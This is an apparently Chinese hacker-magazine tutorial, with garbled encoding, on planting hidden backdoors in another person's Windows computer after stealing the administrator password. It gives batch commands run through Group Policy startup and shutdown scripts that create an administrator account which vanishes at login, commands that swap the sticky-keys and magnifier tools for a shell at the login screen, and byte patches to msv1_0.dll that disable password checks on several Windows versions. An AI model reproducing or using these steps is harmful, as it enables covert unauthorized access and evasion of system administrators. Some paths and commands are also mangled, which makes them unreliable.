在上期的文章中，我們講解了如何利用系統(tǒng)自動(dòng)登錄的漏洞，揪出被記錄在注冊(cè)表中的密碼。拿到了管理員的密碼，肯定是要為自己建一個(gè)后門了，許多小黑們往往都是直接開始新建帳戶，提升權(quán)限，然后隱藏新建的管理員帳號(hào)，又或者直接進(jìn)行帳號(hào)克隆。其實(shí)這些方法用的人多了，也就不是那么隱蔽可靠了。今天，我就把自己平時(shí)隱藏后門的方法介紹給小黑們，看看怎樣發(fā)揮自己的聰明才智，打造自己的后門……

無可檢測與刪除的“隱藏”后門

這里我們要給別人的電腦，設(shè)置一個(gè)永遠(yuǎn)都檢測不到。也無法刪除的管理員帳戶后門。建立后門的方法是利用開關(guān)機(jī)腳本，但是與普通的開關(guān)機(jī)腳本后門有很大的不同!我們先來看看建后門的方法，最后再來看效果。

準(zhǔn)備開關(guān)機(jī)腳本

首先，獲得管理員密碼并登錄后，打開記事本程序，在里面輸入如下內(nèi)容：

@echo off

net user xlaoyao 123456/add

net localgroup administrators xlaoyao/add

這段語句的作用是，新建—個(gè)帳戶，并將新建的帳戶加入管理員組中。其中，“xiaoyao”是用戶名。“123456”是密碼。在這段語句中。還有一個(gè)“@echo off”，是在批處理中。用于禁止命令執(zhí)行后的回顯信息的。

輸入完畢后。將文件保存為“關(guān)機(jī).bat”。然后再打開記事本程序，在其中輸入如下語句：

@echo off

net user xiaoyao/del

這條語句的作用是，刪除系統(tǒng)中名為“xiaoyao”的帳戶名，也就是刪除我們剛才新建的帳戶名。最后，保存文件名為“啟動(dòng).bat”。

啟用開關(guān)機(jī)腳本

點(diǎn)擊“開始”菜單－“運(yùn)行”，輸入命令“Gpedit.msc”，回車后打開組策略編輯器程序窗口。依次展開“計(jì)算機(jī)配置”－“windows設(shè)置”－“腳本(啟動(dòng)/關(guān)機(jī))”項(xiàng)目。雙擊右側(cè)的“啟動(dòng)”。打開啟動(dòng)腳本設(shè)置對(duì)話框。點(diǎn)擊“顯示文件”按鈕，將會(huì)自動(dòng)打開系統(tǒng)啟動(dòng)腳本目錄“C：＼WINDOWS＼System32＼GroupPoLicykMachine＼ScriptskStartup”。將剛才建立的“啟動(dòng).bat”移動(dòng)到此文件夾中。然后關(guān)閉文件夾窗口。在啟動(dòng)腳本對(duì)話框中。點(diǎn)擊“添加”按鈕，瀏覽指定當(dāng)前目錄下的開機(jī)腳本文件“啟動(dòng).bat”。

點(diǎn)擊確定按鈕。完成添加。再點(diǎn)擊“應(yīng)用”按鈕，使用當(dāng)前啟動(dòng)設(shè)置。關(guān)閉啟動(dòng)腳本設(shè)置對(duì)話框。然后雙擊組策略編輯器中的“關(guān)機(jī)”項(xiàng)目，打開關(guān)機(jī)腳本設(shè)置對(duì)話框，用同樣的方法添加關(guān)機(jī)腳本為“關(guān)機(jī).bat”。最后關(guān)閉組策略編輯器。無可檢測刪除的后門就創(chuàng)建成功了!

開關(guān)機(jī)后門的不同之處

我們創(chuàng)建的這個(gè)開關(guān)機(jī)后門。與普通的開關(guān)機(jī)腳本后門有很大的不同。普通的后門，往往都是在開機(jī)啟動(dòng)腳本中。設(shè)置添加管理員帳戶的語句。讓管理員一登錄就會(huì)自動(dòng)創(chuàng)建后門。這樣的方法有很大的弊病。管理員登錄后，肯定會(huì)檢測系統(tǒng)中的帳戶列表，一旦發(fā)現(xiàn)非法用戶。肯定會(huì)將用戶刪除。即使他下一次登錄后，又自動(dòng)將被刪除的帳戶創(chuàng)建，但必定會(huì)引起管理員的注意，從而揪出后門的根源——開機(jī)腳本。

因此，我們的目的是創(chuàng)建一個(gè)特殊的帳戶——管理員登錄后。檢測用戶列表，根本發(fā)現(xiàn)不了有非法用戶。即使檢測克隆帳戶，也一無所獲!但是我們卻可以用這個(gè)帳戶正常的登錄!

這是為什么呢?因?yàn)槲覀冊(cè)O(shè)置的關(guān)機(jī)腳本，是自動(dòng)創(chuàng)建一個(gè)管理員權(quán)限的帳戶。也就是說，只要管理員登錄過系統(tǒng)，當(dāng)他關(guān)機(jī)退出后，就會(huì)自動(dòng)在系統(tǒng)中創(chuàng)建一個(gè)管理員權(quán)限的帳戶。然而當(dāng)管理員登錄系統(tǒng)時(shí)。卻由于開機(jī)腳本的作用，自動(dòng)將我們添加的帳戶刪除掉了，因此管理員無法檢測到根本不存在的非法帳戶。也就是說。創(chuàng)建的帳戶后門，只存在于系統(tǒng)啟動(dòng)到登錄成功之前的這個(gè)過程。也就是登錄前帳戶是存在的，登錄后就會(huì)被刪除，夠隱蔽吧!巧妙的3389后門

除了在本機(jī)登錄外，我們可能還想留下一個(gè)帳戶后門，讓我們可以從遠(yuǎn)程3389終端登錄。直接建立帳戶名是比較危險(xiǎn)的方法。我們可以利用Windows系統(tǒng)中特殊的輔助工具來完成這個(gè)任務(wù)。

點(diǎn)擊“開始”菜單－“運(yùn)行”，輸入命令“CMD”?；剀嚭蟠蜷_命令提示符窗口。在命令提示符窗口中，執(zhí)行如下命令：

copy c：＼wmdows＼explorer.exe c：＼windows＼system32＼sethc.exe

copy c：＼wmdows＼system32＼sethc.exe c：＼windows＼system32＼dUcache＼sethc.exe

attrib c：＼windows＼system32＼sethc.exe+h

atmb c：＼wmdows＼svstem32＼dUcache＼sethc.exe+h

這幾句命令的作用，是將系統(tǒng)中的輔助工具“sethc.exe”。替換成為“explerer.exe”，這樣就可以在3389或本地登錄界面中打開粘滯鍵開關(guān)了。以后在3389遠(yuǎn)程連接窗口中，連續(xù)按下5次Shift鍵。即可自動(dòng)打開資源管理器。點(diǎn)擊工具欄“向上”按鈕。返回到桌面，右鍵點(diǎn)擊“我的電腦”。在彈出菜單中選擇“管理”命令，打開管理工具，直接添加用戶名即可。也可以打開控制面板中的用戶帳戶，添加管理員帳戶。用同樣的原理，也可將“sethc.exe”。替換成為“cmd.exe”，即可在CMDSHELL中執(zhí)行帳戶添加命令。

小提示

在windows 2000/xp/vista下，連續(xù)按shift鍵5次，可以運(yùn)行“sethc，exe”打開粘滯鍵，而且在登錄界面里也可以打開。采用替換“sethc.exe”的文件的方法，就可以實(shí)現(xiàn)運(yùn)行任意程序的目的。其原理類似于將Windows系統(tǒng)的屏保程序替換成“cmd.exe”。就可以打開shell了。

留個(gè)放大鏡后門

上面利用的是粘滯鍵輔助工具。其實(shí)系統(tǒng)中還有其它的輔助工具。比如“放大鏡”——按下Win+U組合鍵，即可打開放大鏡輔助工具。可以用與上面相同的方法來創(chuàng)建一個(gè)后門。不過這里我們利用工具來完成操作，并且還要為后門加上一個(gè)密碼。

運(yùn)行“放大鏡后門生成器”，在“后門啟動(dòng)密碼”中輸入要設(shè)置的后門密碼。然后點(diǎn)擊“生成”按鈕，指定生成文件名路徑為“C：＼ivy.exe”。然后點(diǎn)擊“開始”菜單－“運(yùn)行”。輸入命令“CMD”?；剀嚭蟠蜷_命令提示符窗口。在命令窗口中執(zhí)行如下命令：

copy %systemroot%\\system32\\magnify.exe %systemroot%\\system32\agnify.exe

copy C \\ivy exe %systemroot%\\system32\\magmfy.exe

copy C:\\ivy.exe %systemroot%\\system32\\dllcache\\magnify.exe

執(zhí)行命令成功后，后門就創(chuàng)建成功了。以后在本地或3389遠(yuǎn)程登錄界面中。按下Win+U組合鍵，打開輔助工具對(duì)話框，選擇“放大鏡”，點(diǎn)擊“啟動(dòng)”按鈕，要求輸入設(shè)定的后門啟動(dòng)密碼。確定后。打開后門程序，可執(zhí)行“cmd.exe”和程序自己添加自定義用戶。直接輸入要添加的用戶名和密碼。點(diǎn)擊“添加”按鈕即可。要執(zhí)行CMD命令的話，可點(diǎn)擊“執(zhí)行CMD命令”按鈕，即可打開CMD命令提示符窗口。

后備絕招——請(qǐng)空系統(tǒng)密碼

在無可意料的情況下。如果所有的后門都被清除了，那么可以使用這個(gè)后備的絕招。Windows系統(tǒng)的“system32”和“dllcache”目錄下。都有一個(gè)名為“msv1_0.dll”的文件，此文件決定著用戶的登錄密碼。只需對(duì)其進(jìn)行小小的修改，就可以清空所有密碼。

首先。在一臺(tái)正常的電腦上，運(yùn)行WinHEX，打開兩個(gè)目錄下的“msv1_0.dll”文件，搜索“F8 10 75 11B0 01 8B 4D”字符串。將其替換為“E0 00 75 11 B001 8B 4D”。這個(gè)修改是針對(duì)Windows XP SP2系統(tǒng)的。如果是其它的系統(tǒng)。可分別進(jìn)行如下修改：

Windows 2000 professional：將“F8 10 0F 84 71 FF FF”修改為“EO 00 0F 84 71 FF FF”；

Windows 2000 sp4：將“F8 10 75 11 bO 01 8b 4D”修改為“E0 00 75 11 b0 01 8b 4D”；

Windows 2003 spl：將“F8.10 0F 84 DO B8 FF FF”修改為“E0 00 0F 84DOB8 FF FF”：

Windows vista：將“F8 10 75 13 B0 01 8B 4D”修改“E0 00 75 1380 01 8B 4D”

只要修改后，全部管理員帳號(hào)無須密碼即可本地登錄或進(jìn)行遠(yuǎn)程登錄。將修改后的“msv1-0.dll”復(fù)制后，進(jìn)入要登錄主機(jī)的DOS環(huán)境，替換相應(yīng)的文件即可。